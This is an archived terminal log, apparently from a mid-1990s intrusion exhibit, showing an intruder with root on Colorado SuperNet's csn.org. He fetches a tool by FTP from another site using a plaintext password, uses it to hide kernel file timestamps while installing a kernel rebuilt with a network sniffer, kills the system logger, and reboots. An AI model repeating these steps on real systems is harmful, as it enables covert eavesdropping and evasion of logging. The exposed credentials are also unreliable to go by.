Kevin On Demand
- Dumb and Dumber - kevin-on-demand.takedown.com 4015
- Start: 1995 Feb 11 00:21:55
- Total Run Time: 7:15
- From NETCOM-rtp1.netcom.net to netcom15.netcom.com.
- The previous night, Kevin rebuilt the kernel (the essential parts of the operating system on a Unix host) on csn.org (Colorado SuperNet)'s server to include NIT (a program for watching what happens on the network), using the CERT advisory on how to remove NIT as a guide. Watch him thrash trying to install a new kernel (he could have done exactly what he wanted to with a one-line command), and reboot their system (so that the new kernel will take effect). Several mistakes were made, causing the task to take much longer and be more complex than necessary.
drwxr-xr-x 4 root 3072 Dec 5 15:08 u32
drwxr-xr-x 5 root 2048 Dec 1 21:24 u31
drwxr-xr-x 4 root 2560 Nov 30 19:32 u30
-rwxr--r-- 1 root 1790901 Oct 24 15:24 vmunix
lrwxrwxrwx 1 root 9 Oct 24 13:43 core -> /dev/null
drwxr-xr-x 32 root 1024 Oct 17 21:17 usr
drwx------ 2 root 512 Oct 14 15:57 .mailbox
lrwxrwxrwx 1 root 7 Sep 14 12:11 bin -> usr/bin
lrwxrwxrwx 1 root 13 Sep 14 12:11 sys -> ./usr/kvm/sys
lrwxrwxrwx 1 root 7 Sep 14 12:11 lib -> usr/lib
drwxr-xr-x 2 root 512 Sep 14 12:11 sbin
drwxr-xr-x 4 root 512 Sep 14 12:10 export
lrwxrwxrwx 1 root 8 Sep 14 12:10 tmp -> /var/tmp
lrwxrwxrwx 1 root 9 Sep 14 12:10 home -> /var/home
-rwxr--r-- 1 root 1790805 Sep 13 17:34 vmunix.old
-rw-r--r-- 1 root 89 Sep 11 21:52 .profile
-rw-r--r-- 1 root 164 Sep 11 21:52 .cshrc
-rw-r--r-- 1 root 62 Sep 11 21:52 .login
-r--r--r-- 1 root 103512 Sep 8 15:59 boot
-rwxr-xr-x 1 root 250272 Sep 8 15:59 kadb
-rwxr--r-- 1 root 2194718 Sep 8 15:59 vmunix.orig
drwxr-xr-x 2 root 512 Sep 8 15:45 pcfs
drwxr-xr-x 2 root 8192 Sep 8 15:41 lost+found
$ ./test1
./test1: not found
$ cd
$ ./test1
test1> open csn.org 3111
Trying 199.117.27.21 ...
Connected to csn.org.
Escape character is '^]'.
nm
SunOS UNIX (csn)
csn# ps
PID TT STAT TIME COMMAND
11082 p1 S 0:00 -sh -i (csh)
11089 p1 R 0:00 ps
9078 p5 S 0:17 sendmail -R bridget.newcastle.co.us
csn# w
1:22am up 13:18, 16 users, load average: 16.47, 13.39, 11.23
User tty login@ idle JCPU PCPU what
Uhumpbac ttyp4 12:14am 1:16 1:16 -uucico
runmailq ttyp5 1:03am 18 /bin/csh -f /usr/local/etc/rmqs
runmailq ttyp7 12:23am 59 /bin/csh -f /usr/local/etc/rmqs
Udlsinet ttyp8 12:10am 1:10 1:10 -uucico
Uraptor ttyp9 1:09am 15 15 -uucico
Uxvt ttypd 11:10pm 2:09 2:09 -uucico
Usraco1 ttypf 12:19am 55 55 -uucico
Unte ttyq0 1:07am 16 16 -uucico
Uexcalnf ttyq1 12:07am 48 48 -uucico
Ucygcyb ttyq2 1:13am 9 9 -uucico
Uenterpr ttyq3 1:17am 5 5 -uucico
Umaple ttyq4 1:21am 1 1 1 -uucico
Uhotelne ttyq5 1:22am -uucico
Uneocad ttyq6 6:26pm 5:22 5:22 -uucico
Uctnet ttyq7 1:20am 1 1 -uucico
Ulookout ttyq8 1:20am 2 2 -uucico
csn# cd /
csn# ls -tla vm*
-rwxr-xr-x 1 root 1916938 Nov 5 1993 vmunix
-rwxr-xr-x 1 root 1926973 Nov 5 1993 vmunix.bak
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1289) (16384 bytes).
/: write failed, file system is full
/: write failed, file system is full
time: No space left on device
226 Binary Transfer complete.
local: time remote: time
1072 bytes received in 0.26 seconds (4 Kbytes/s)
ftp> get time /tmp
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1292) (16384 bytes).
/tmp: Is a directory
226 Binary Transfer complete.
421 Service not available, remote server has closed connection
ftp> get time /tmp/time
Not connected.
ftp> quit
csn# rm time
csn# cd /tmp
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1300) (16384 bytes).
226 Binary Transfer complete.
local: time remote: time
16384 bytes received in 1.7 seconds (9.2 Kbytes/s)
ftp> quit
221 Goodbye.
csn# chmod 777 time
csn# ./time /vmunix > foo
csn# cat foo
/vmunix 792490984 752543991 779041123 0 1 33261
csn# ./time /vmunix.bak > bar
csn# cp /vmunix .
csn# cp /vmunix.bak /vmunix
/: write failed, file system is full
/: write failed, file system is full
cp: /vmunix: No space left on device
csn# cp /vmunix.bak newunix
csn# rm /vmunix.bak
csn# cp newunix /vmunix
csn# ./time < foo
csn# ls t-la /vm*
t-la not found
/vmunix
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
csn# cp vmunix /vmunix.bak
csn# ./time < bar
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
-rwxr-xr-x 1 root 1916938 Nov 5 1993 /vmunix.bak
csn# cd /tmp
csn# rm foo bar *unix*
csn# rm time
csn# ls -tla | head
total 201
drwxrwxrwt 3 root 1428 Feb 11 01:26 .
-rw------- 1 root 65536 Feb 11 01:26 twza08692
drwxrwxr-x 19 root 1024 Feb 11 01:25 ..
-rw-r----- 1 uucp 0 Feb 11 01:08 rnlog.9541
-rw-r----- 1 uucp 1283 Feb 11 01:08 rnews.9541
-rw------- 1 root 0 Feb 11 01:00 croutIJAa00130
-rw-r----- 1 uucp 6945 Feb 11 00:20 rnews.4211
-rw-r----- 1 uucp 0 Feb 11 00:20 rnlog.4211
-rw-r----- 1 uucp 0 Feb 11 00:12 rnlog.3118
csn# pwd
/tmp
csn# w
w: cannot allocate space for percpu_ptpe: Not enough memory
csn# ps
ps: cannot allocate space for percpu_ptpe: Not enough memory
ps: could not read kernel VM
csn# ftp
ftp> open well.sf.ca.us
Connected to well.sf.ca.us.
220 well FTP server (UNIX(r) System V Release 4.0) ready.
Name (well.sf.ca.us:root): dono
331 Password required for dono.
Password: fucknmc
230 User dono logged in.
ftp> bin
200 Type set to I.
ftp> get time
200 PORT command successful.
150 Binary data connection for time (128.138.213.21,1364) (16384 bytes).
226 Binary Transfer complete.
local: time remote: time
16384 bytes received in 1.4 seconds (12 Kbytes/s)
ftp> quit
221 Goodbye.
csn# chmod 777 time
csn# cp /vm* .
csn# ./time /vmunix > foo
csn# ./time /vmunix.bak > bar
csn# cp vmunix.bak /vmunix
csn# ps -aux | grep sysl
root 11731 0.0 0.2 32 204 p1 S 01:27 0:00 grep sysl
root 9721 0.0 0.3 60 300 ? S 01:11 0:02 /usr/etc/syslogd
csn# kill -9 9721
csn# cp vmunix* /
csn# ./time < foo
csn# ./time < bar
csn# ls t-la /vmun*
t-la not found
/vmunix /vmunix.bak
csn# ls -tla /vm*
-rwxr-xr-x 1 root 1926973 Nov 5 1993 /vmunix
-rwxr-xr-x 1 root 1916938 Nov 5 1993 /vmunix.bak
csn# rm *unix* foo bar time
csn# pwd
/tmp
csn# ls -tla | head
total 221
drwxrwxrwt 3 root 1428 Feb 11 01:28 .
-rw------- 1 root 86016 Feb 11 01:26 twza08692
drwxrwxr-x 19 root 1024 Feb 11 01:25 ..
-rw-r----- 1 uucp 1283 Feb 11 01:08 rnews.9541
-rw-r----- 1 uucp 0 Feb 11 01:08 rnlog.9541
-rw------- 1 root 0 Feb 11 01:00 croutIJAa00130
-rw-r----- 1 uucp 6945 Feb 11 00:20 rnews.4211
-rw-r----- 1 uucp 0 Feb 11 00:20 rnlog.4211
-rw-r----- 1 uucp 0 Feb 11 00:12 rnlog.3118
csn# cd /usr/etc
csn# ls sys*
syslog syslogd
csn# cd /etc
csn# grep sys rc.l*
# the anonymous memory based file system, have an fstab entry of the form:
# syslogd doesn't belong here, but needs to be started before the others.
# It needs to be started after NIS, though, so it can find the "syslog"
if [ -f /usr/etc/syslogd ]; then
echo 'starting system logger'
syslog
syslogd
# start up sysmond
#if [ -x /usr/local/sysmond/bin/sysmond ]; then
# /usr/local/sysmond/bin/sysmond > /dev/null &
csn# w
w: cannot allocate space for percpu_ptpe: Not enough memory
csn# /etc/reboot
Connection closed by foreign host.
$